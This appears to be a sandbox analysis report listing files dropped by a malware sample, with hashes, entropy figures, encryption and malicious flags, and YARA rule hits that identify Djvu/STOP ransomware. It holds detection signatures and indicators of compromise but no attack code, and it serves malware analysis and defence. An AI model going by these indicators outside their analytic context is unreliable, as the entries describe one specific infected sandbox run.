                                                                                                                                                                      SHA-256:9DA0C76F9329793936A59AE6D3B8F6D3A1CAE6F542D4A953CDE13D5DBDF19512
                                                                                                                                                                      SHA-512:118A8B30889DC0B233C01C0B03F3A438D353A50E8B3024027CD3B14C84A9F59AFD47F809A0087834C5D3962BB806384DBBD9626F71BFD3E6E3956DC335900553
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):116817
                                                                                                                                                                      Entropy (8bit):7.99834229687958
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:TvyRhFfuM/DmOCD9tRmvC80sDHpXQbLDEx8BHBnkRfscOK:ryvtugDmOCD9y/LXQb+8BHBnQscOK
                                                                                                                                                                      MD5:30FD659557EC7D6F0D75714F244E8A98
                                                                                                                                                                      SHA1:70E96851E08BCCAB4D466737C0C07AF4F1FED6D9
                                                                                                                                                                      SHA-256:E9FDEC69F08423AA984ED660A5419C76AA47DC262C9778AC8A6B5E1F7B85825B
                                                                                                                                                                      SHA-512:6604C9711C830030533F24157388315FEBE6916E5CD965B160830CFABAF934CCDC3265681C419764ABFBB378DAF4A000D67CE7C89B1F9E8755245A1C26FE8359
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115275
                                                                                                                                                                      Entropy (8bit):7.998549933619998
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:g6upM2NU+2AfZa09wWGwR5ZflN4gnFYRP1sB1H50uBE:/up3NU+26DCZwLZfcYYU1H5fS
                                                                                                                                                                      MD5:95440F8917A15CCA85FE8ECA2D9EC746
                                                                                                                                                                      SHA1:AA420B0F61C29E0572994F5A77161FCD81D8B341
                                                                                                                                                                      SHA-256:34E4452FE1E9082603D1BDEBAB8142152E41E374186849AF294A60E8A3471A72
                                                                                                                                                                      SHA-512:4F782E9505C3EB36AC19AFCC001769070B9BD9C141C4BF61428BFCAE0B4B24149F8D8BDE17C035E3DA60282F3C7E75BD2375BC7AF3B784DE4ED4801ED133D43A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115275
                                                                                                                                                                      Entropy (8bit):7.998414233635635
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:mbf0zF+X5nuTvB9EGNgy9H+LfDzienuwPn1ZQ:mbfEFzjffUfDFuwPrQ
                                                                                                                                                                      MD5:AF52496670A66CBCAD2D57E0C5F213AE
                                                                                                                                                                      SHA1:A3005FB0C56E68F92F7C14F429B970012A961944
                                                                                                                                                                      SHA-256:504A86427B5DA926F6D3CE0543C52AF2DEC11B14F0A3BC6A3C77838DB860ECEA
                                                                                                                                                                      SHA-512:B70E1A5E9D13E1AE4503B59CDDAE8E69735AA2494F126ED73CFFE08B092135F4E07DF5B9F16B4AB4A16B61138DF4A2C8D6F3305EA3B385FCD769BD90D2E293F8
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):696930
                                                                                                                                                                      Entropy (8bit):6.207681349275024
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:j+zZKnOu91dIoGotdYuMOCc5MpzgroTDLgj:OAXI1uMOCc5MpzgroTDLy
                                                                                                                                                                      MD5:72B897D62CCD62D16C724C965838A00D
                                                                                                                                                                      SHA1:6D1FE57AFF4FB44483673E4033950BCC2666716E
                                                                                                                                                                      SHA-256:8C8A292948C8B1B34957949D9058302103CE3654ACCFC942B8F504A76D6380DE
                                                                                                                                                                      SHA-512:324DD71B58933C26BF91AC28D8180BF9EC367CC848BEEDE76C8DCD09D17F72EECA640F58210C5404B00190DF90D6867962D0CDEA8772D24F321D28FC26524AA6
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7458
                                                                                                                                                                      Entropy (8bit):7.9753048493852585
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Xml3rv8JiGBHv8Iw9eEmLY7qC8caoOOvcNUDUE2f+5Krlj0VI:XQvsXKeNLY7qC83yR2jlj0VI
                                                                                                                                                                      MD5:CA89CAC5A2AAEF0B74EAADF1E2D36FDD
                                                                                                                                                                      SHA1:4AA7EC87BA61ECC2A16AB1E8A61F5FCD2B29ADB7
                                                                                                                                                                      SHA-256:90CD1465652C35725C0B4C83D936AA17D1182B515A2699AD5E6F27F6AE32A77F
                                                                                                                                                                      SHA-512:A7D39B04D7BB4D66E79DB87CB33C38D0F1DF06732900482922A7DBC0B9E331BE1FE985BC28D6C97BC7346C4F2E88C43C01826EDFCF8A43679A84E7C2D1F14455
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6854
                                                                                                                                                                      Entropy (8bit):7.971594329405809
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:mCRdNyZjqHjldeJ3N9mPati1WNV6KU2Ym7jtwoMLFg:mqdIADldeV2CIKb/3qFS
                                                                                                                                                                      MD5:6015F9AD575CBD522D579CF307DA3AA8
                                                                                                                                                                      SHA1:1FE777575729BB6C528A0A43CFE74C0A93B5CC12
                                                                                                                                                                      SHA-256:BE86857CA88C729D8159BBBE11B04185EC2418684E36C9A674FA2D99E8E9E7CE
                                                                                                                                                                      SHA-512:AB1F32CC69DF588DE1895C3C81013830C97DA80F256EF365A6ED74C8338E0C12250357A06E643FB96D121EFFB8452BABBA66E01D00F8BE790432B7E587BFF659
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):149024
                                                                                                                                                                      Entropy (8bit):7.998744759232726
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:/2yFF+38b28J/GfLpdzV1cwr1v+1GAyUzIAVdclP:/fFuIJaLbV51v+UvQcF
                                                                                                                                                                      MD5:2BB1FBCD12084724C46305BBBF14CF84
                                                                                                                                                                      SHA1:ECC0CC79A876B8DD738EFDB04D87E9CE5E1B259F
                                                                                                                                                                      SHA-256:66CC5364E562C625A831AAD97E34579CD9A0053492672B964E6A5492473E5A08
                                                                                                                                                                      SHA-512:CB021E575ABC9F9162765CE750C48A43AA4E723EAB18D6ED46BB31538D847E7BA5C08DE8E02E5EEACFE386542208B1F37B47F8D2C83942DF9948C04118FE3706
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.975608600247933
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:QjNixvWL0/ZO4yjJfFOyklOaopCPofQFab943jhqzjTO9fp+xxi3mWJgZhhh01OW:Ks5vyRwykl5IQFabE9v27ZK1OSlP+G/
                                                                                                                                                                      MD5:191E90841762EE6ED8BE141D0AA5F6E9
                                                                                                                                                                      SHA1:AE162DC7D91A680CD05A738FA93A424757E4E8FE
                                                                                                                                                                      SHA-256:48577FF7F88F9E257C0144AA878A587D14F629E61AE4CEBDC7DEC1DE1566834B
                                                                                                                                                                      SHA-512:FBE0AFF6DE1692C7D36E52338854159792EE68AF2BA828E514BC059A09EE6C79FDAE55E2E4F67502701879730472DC65D335F7D8EDEFA5F5E5B288721ED24A73
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.977066282573455
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:akp4/Z6NEsuAiLwRRHUDvQ4V5wrm6kTMMvF84PBttzsp1MQ06UMuMuShR:a9Z6NEsfbHKvQL/Q84ZtacQ06Ua
                                                                                                                                                                      MD5:5D99E1DB271EDC1E293ACA7FD81B4339
                                                                                                                                                                      SHA1:3324CEBFCEBBF39465DF6A6D66C6F1239339CCEA
                                                                                                                                                                      SHA-256:7842E02A3815610C89045E04307F3FC20ECD70A1C723712679C25246D0EC5022
                                                                                                                                                                      SHA-512:6CFEB76DB47481E8F56A9D8B0E54FD4D1A5630E735C2CD6FE6884AEE6DC65D6A7FCDD3531F2E1F6717D054D672719CD9158CCD1CF8C10E516F56FF6108D65692
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):615
                                                                                                                                                                      Entropy (8bit):7.630413610087426
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:PMbsY2arIc0sVXJEa1JpUN0bCj7MjSQptH91YDAd09SUdNcii9a:UbB9ZbpUNOCvMjSQX9iNw2bD
                                                                                                                                                                      MD5:9ACBBF66EC547A638A28F208668E5777
                                                                                                                                                                      SHA1:D250333ABB2101E8B97DAFC05E5EA212B997DA81
                                                                                                                                                                      SHA-256:099B050F17B0A50AE72D732B6A8150594BF7CDF39913C4972C8A725D6F22D8E4
                                                                                                                                                                      SHA-512:B4DF2C263B9DB714D2F82007CCD60286D635A374429710DDD225339B653CBF77F98653EB6BACC9EEDCF879CF9610C2FC6B07ECA2A079F2F338329CB5D165911E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):102646
                                                                                                                                                                      Entropy (8bit):7.998556509935242
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:a/PuMwdNriRvhgn+1zajxjeOXyxxf81m1c:KuJIR12jwhLW
                                                                                                                                                                      MD5:6E6A4272712522C2D6CE642549D42343
                                                                                                                                                                      SHA1:B26E0B74E141E998284557EEFD042BBEDEEDEEC2
                                                                                                                                                                      SHA-256:2DAD724B30470965A6DF44F682FCC7D13D45FDAD53553878ED3BA2E329985774
                                                                                                                                                                      SHA-512:2A84EE7338958CEB35FB93E40F64B9A8B0A039665B638F5EB22C6E3CC888BB303AB6EE115B3906D06BF36E4337C986FF006771C96E94267E2D987F19E032C1AE
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8547662
                                                                                                                                                                      Entropy (8bit):5.205002898626682
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:kCqBnJ38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOE:F2nFF1qd/LKNE
                                                                                                                                                                      MD5:C402EA8362EFA8BB3BDFCA9CD62152D2
                                                                                                                                                                      SHA1:3C133C51F0D073EE60AF12A399CABD4AC6BC8D43
                                                                                                                                                                      SHA-256:05F76034DC64F63359286FBC6D2E2366447361A9CBE4FC5B0DAA0A27BEC65B3B
                                                                                                                                                                      SHA-512:A039AF4B7B3A0326CD5289A128B6BC1ED28B770E85B796E22512ABE6E9034A6C11A2B462834F24262DEB18F1F534112384A1A9D8099697D7B01292D84E6F9F37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8547662
                                                                                                                                                                      Entropy (8bit):5.204993653261307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:Ir3N38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOY:AF1qd/LKNY
                                                                                                                                                                      MD5:DF7922624156103E9F8665EFE657AE8B
                                                                                                                                                                      SHA1:00B3763A09B8C693C7AF24AA537CB00ADFBFF680
                                                                                                                                                                      SHA-256:EFB242FF48BE326575120F75A02EF3B8BCE246F6D150255CD8477A2BEAA68E8F
                                                                                                                                                                      SHA-512:97FC859C8D9C604E273CB4F844701027286A530C1DD2958D56DDD4449D9C833B2407F23F2C0B5E5D83FB0765FD2A45E72890C94E35FA4B08F2C62B474157670A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1192270
                                                                                                                                                                      Entropy (8bit):5.662603320691926
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:+JgN5539kO59JQ4aKVmaS4aMz8Pg3lxJo2cvXtK:+JAr7BaKVzaYcAqtK
                                                                                                                                                                      MD5:EB8D9AA151E196F10E79366D874A5D27
                                                                                                                                                                      SHA1:5BE62D8CA863CA761E631AE27697324E9C64D5A0
                                                                                                                                                                      SHA-256:88EEE91050FCAB7F62FF77129B8FB965C78B11E59DE4093045B4651190D1AAB5
                                                                                                                                                                      SHA-512:0E4C9F37D5C894D74AE7C890EEE03A7B4A00F61B57BBF39DB1EF5356426300A59BA3DF0E3308B3061DE0B47B49FEDC3A464A08CDD15503ACF436105E89EDD295
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1192270
                                                                                                                                                                      Entropy (8bit):5.6628843005086935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:6Vara59Z/YNMeJQ4aKVmaS4aMz8Pg3lxJo2cvXtG:6srg/YSeBaKVzaYcAqtG
                                                                                                                                                                      MD5:90C162170598DBE784F5EE4829AC9FBC
                                                                                                                                                                      SHA1:8FCC20B09D9BB969902A93E779581554BBBBDD6E
                                                                                                                                                                      SHA-256:95633921B215BFE06782E230C3774EB902884E26C4F81D3613C10DE596517CE0
                                                                                                                                                                      SHA-512:183332B8150DE0EDBBD86A6BB2A90E6219DC5786D7E63A373402252E59022E492BF28ABE1C9A53D7D25EEF91390BFD66B50F08CB4F1B1482D1DDABFEFE9DF65E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24210
                                                                                                                                                                      Entropy (8bit):7.992344970000963
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:WxALCcO1a0N75kZ0shhdRFPa+XkUbQGoFkcaA/zVStglzxH8s5yGsKXSiCO2njNk:WxA2QIkZhhhdra+3UGskcNjdxH8SsKCC
                                                                                                                                                                      MD5:00CBEC92837BFA61321FDFD73F8525BA
                                                                                                                                                                      SHA1:695BF1A199C63AFC5570BCA827CA307549D364E6
                                                                                                                                                                      SHA-256:9BD7F975B2E014CD14AD911B24F68248CD118FC908F70521E22468D37E04B5D3
                                                                                                                                                                      SHA-512:279892F7EB40A084135DF9C4ADC3C7ECC05BF0F74CF1552736ED086B72596FAE06A1819F41FBB3F04AC8684FBBB6FB5BE315ABEE295EB712728F814926239F98
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):602502
                                                                                                                                                                      Entropy (8bit):3.1758426787485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:FVwMtY2yly08UBNHq213Lunp1HHxa1Xez99xR/evPObEzFgiBAePaHvt:dpylIUa2cnp1nxa1OHev2gdBRP0t
                                                                                                                                                                      MD5:C431AAEA8C96F062BAE6D3BA8DF9F3FD
                                                                                                                                                                      SHA1:A1F08C00B3F42BAB7283F3328CC32FCC8246B11F
                                                                                                                                                                      SHA-256:138769CE6EC5AA5F22285AC26F31314225C54ED3A688EAF158AEDE425B724D60
                                                                                                                                                                      SHA-512:E882C50B7A23210C982BBDF017FA8D39DFFDF7937BF4910DAF4CEA06E70620AEDDB540F009E4FA0A0F72B5E22DFBBDC126DC32E1F5C560B6D00E16297BCFDAFB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):602502
                                                                                                                                                                      Entropy (8bit):3.17577967829685
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:hvRRL0ezf98Y55jHQ+HWuaSvbOh/02oKyQ4Qso8/vFaD5JqwnOVZqEi7UOk+H6P9:F34+v5jFsFivQ4k6NaXtn8cxG6ctht
                                                                                                                                                                      MD5:8FA66675D2993856C4B061351E985500
                                                                                                                                                                      SHA1:6215093AF66249CE476F0F1584C361C1F6016C39
                                                                                                                                                                      SHA-256:6DD02C3EECC8B6C862595C54D4E57391A439B7D28D0BB3E199F403EE2FAFA05A
                                                                                                                                                                      SHA-512:2AB60E0916EDCFC844C729DECCC6F57B8F6AB29D572AF71A91270E8B7DD05F2DE55AF679160BACEA699A25B7B74F3F8CB84C03748F0D6847893E8044BD12C336
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                      Entropy (8bit):7.955143191874938
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:oJfzav5wIOGZGIw4tmiBGrVdeUQoYcSQ8:2zK5w/8GI3vBGp4t/Lz
                                                                                                                                                                      MD5:6CEFD9476619F511496C8995B0D6C80B
                                                                                                                                                                      SHA1:6069C02C294716AD6350A917EB9D61DF096CDBEC
                                                                                                                                                                      SHA-256:FB5C6CF41B77BF42929C3EAF1A054F8DE34147783D55C2DB6919C52F1032AB68
                                                                                                                                                                      SHA-512:B5F23E6D4495F15A297F4E2EFD0B55FC06078E9E7398D8FE624FF096C190E739AEBC8BE77320EBA801B2A9D84376A65BCFB3701DAE0089888BB1A29A97A0D86A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22093
                                                                                                                                                                      Entropy (8bit):7.991654534970632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:rSMBmV2FC6VlnabCWh6mJO1o9RYanzwgcN9Uvju4ygu+vpFV+:rvmV2PnabMmJOgogyZB
                                                                                                                                                                      MD5:B00DCA29F41A400044C6B84B564EC7FC
                                                                                                                                                                      SHA1:046FA92A2B897489243DEA3C65FC01034567A81D
                                                                                                                                                                      SHA-256:1DAED82B114FEE04C0D0991F6A0F62DE17972625122FB78F624D9C14EBDEF2C5
                                                                                                                                                                      SHA-512:38C274E0A545ECAF661E532EBE5BC3CB7F060AD636A33959D4134F2746D7EFBD0D98DAC918A0EC8657FC666D77AA9C2E09D3DF1F016A1C4EEC12ABDA9C87E726
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66542
                                                                                                                                                                      Entropy (8bit):7.99743314954008
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:ViXn+uL8e/m6KSrNOMRgWpKj6OvATtj3ptV:ViXnr8e/wSrQYzpKjFObptV
                                                                                                                                                                      MD5:2603DA37257A8A247FB2C33FF9CF3958
                                                                                                                                                                      SHA1:3E107A84DD60774EEA2476378258126EA0DAE9DF
                                                                                                                                                                      SHA-256:F73B072B091AD2025929FBD13236992DB95CF19528EF8B500CF958BF3FDB05E9
                                                                                                                                                                      SHA-512:BE9FDDF5EBBECDDBE12B14CC04BD8F2C712FAF51862122B886361D372CFA93074FAADA742BF2ED8A991ABD683FEB5B036225477521FB7096CE3FB59A9EDA07E4
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1045
                                                                                                                                                                      Entropy (8bit):7.803891580628994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yYYz45hYHQm9CyoP1PKDBbRdfe5gknybYdCoQcoqyuP2bD:yYs5wbP12B9oOknybYdCZD
                                                                                                                                                                      MD5:A850838C81B8F9B4E3D45C7867ED3392
                                                                                                                                                                      SHA1:C280EE636A54B4DF84BDAE815064A772A975C032
                                                                                                                                                                      SHA-256:690B3FE2C2FD65F04A6638E7F544115C17B4D52806E435DCED2AD589A650D9A5
                                                                                                                                                                      SHA-512:195A3C546F9F2D53FB8B6AD8B4039674DB045ED511604F17E080723BA460C80751203944F591DFC3B3A31254EC1D0B41CAD0852EC708419BB411DD396CF65562
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662049
                                                                                                                                                                      Entropy (8bit):6.820736284713287
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:+mpCFZK0nPRMf5t/EpwSkpyY8hLhzivQiifjhsLT3DZePTVakbYwsqVhKXHgjSD/:+mpQZ7Y5dEvYUL9cQiee/t4P+qVKTpp
                                                                                                                                                                      MD5:A05B5C31EF412F9D1A0635F4ABC5FB14
                                                                                                                                                                      SHA1:74774DDAA4DDFB668262AE4F84B935B9A7ADA5E8
                                                                                                                                                                      SHA-256:5AF963D4D9B175E10D8EE3D104EF17300143815DD907BF133BCA23674A057873
                                                                                                                                                                      SHA-512:2DCB17DFF578C0D86258B0C643E6645CAEFFEC5BC0F19ACA8AE912362FF119B0A63E4CCC3B12F9D2B852F02E87355243B29B0548E2F5DA1B15E8509A06DBA6A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):193297
                                                                                                                                                                      Entropy (8bit):7.871132317136255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:D5ErIAnKBjWerxLtPpk76TXC4pVojpCYPmuihm/+DaClwc6/O8Wv+lWRQ5ukyS68:D5KIAnKtWuLtPQP+VHgmM+D5SBWmlsQH
                                                                                                                                                                      MD5:88D5CD2B2B159775F4FDCA2E7366636C
                                                                                                                                                                      SHA1:20EBF41A7CDCB0572BD7B4A60D1C8A4F9E3BB917
                                                                                                                                                                      SHA-256:3B5FAACCF50E761C5AEF518BC936157B31D10C9DDE8E132860CA15549023A185
                                                                                                                                                                      SHA-512:7196F7DF982245D19F3085B3BAC39E15D33C3B26F8C15715FCC8BDBABF5338FC02E64FA780C849E5870509AFBD62FA918101EDE38389DEC2D9C6CD70EFF2F9CA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240241
                                                                                                                                                                      Entropy (8bit):7.548304848862768
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ho9Cl+Zhe+/lQWUIhBPIaSEHCVoWYxsmht:i0opdUuPIalHCVo3
                                                                                                                                                                      MD5:C159C179D4F51D7049E29F8F566F633B
                                                                                                                                                                      SHA1:6999C63F2452341E878B8096A540604A2E82416C
                                                                                                                                                                      SHA-256:A8250DAD104225F5056EC566B245D4E6B982CE975C8EADE753A020ECDE0A4236
                                                                                                                                                                      SHA-512:60DB792A26BFC8EC194F43D79D91226803240431FBD26A9DF5380B116F3C73A07A03F6C70319AC154FCC439CF975024C6F92C71ED982C3C4833DB01BAF37B95C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1151310
                                                                                                                                                                      Entropy (8bit):6.929373407480307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:gt0j/KGxOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7W:m2uwAYZt6C31WeTVRPOhd7Uq7W
                                                                                                                                                                      MD5:4605FB1CE589925B9EE6DAFA3EC49F4B
                                                                                                                                                                      SHA1:11788700DB14C5D2B87595C3C703355A281AE5D6
                                                                                                                                                                      SHA-256:98133353158CFE6173CFE7CE1A6EFFAC016BDE005433A4B6D00581C25A44CEBA
                                                                                                                                                                      SHA-512:8FB7702392B3CF8984C3D4978251990411E3E974DC5A0373831D48EB56E55D4CD01ACD6EF38743E9E37A0ADBDD24E6437864BA71D28EC6FA0199959415458422
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, Author: unknown
                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, Author: ditekSHen
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997616686237543
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kmVKdWUiDDkzdx171LWyljK1k92EER8mm0ps09g3ZZxvYTf3pX7:ZaisRx1719N2kUEl0pX96ZxvYTxL
                                                                                                                                                                      MD5:5BEAB8757C3E333F7DA0E3CF6111FCE3
                                                                                                                                                                      SHA1:344F87AB4CD128AE699F272BD0558E2AA08D440F
                                                                                                                                                                      SHA-256:7F53B2A7E9FE928855B2C939E0E6FB90035F411B85857FD1C944E8264E2617FF
                                                                                                                                                                      SHA-512:5E04ACCBCA6F2BCB4457D043D739AE0F1051F495DF97E64B7612AB7F852394E205D1C9E858184405BC0D740A5450E9913B79AD45BAAFCF97C11E0A09380F6E76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
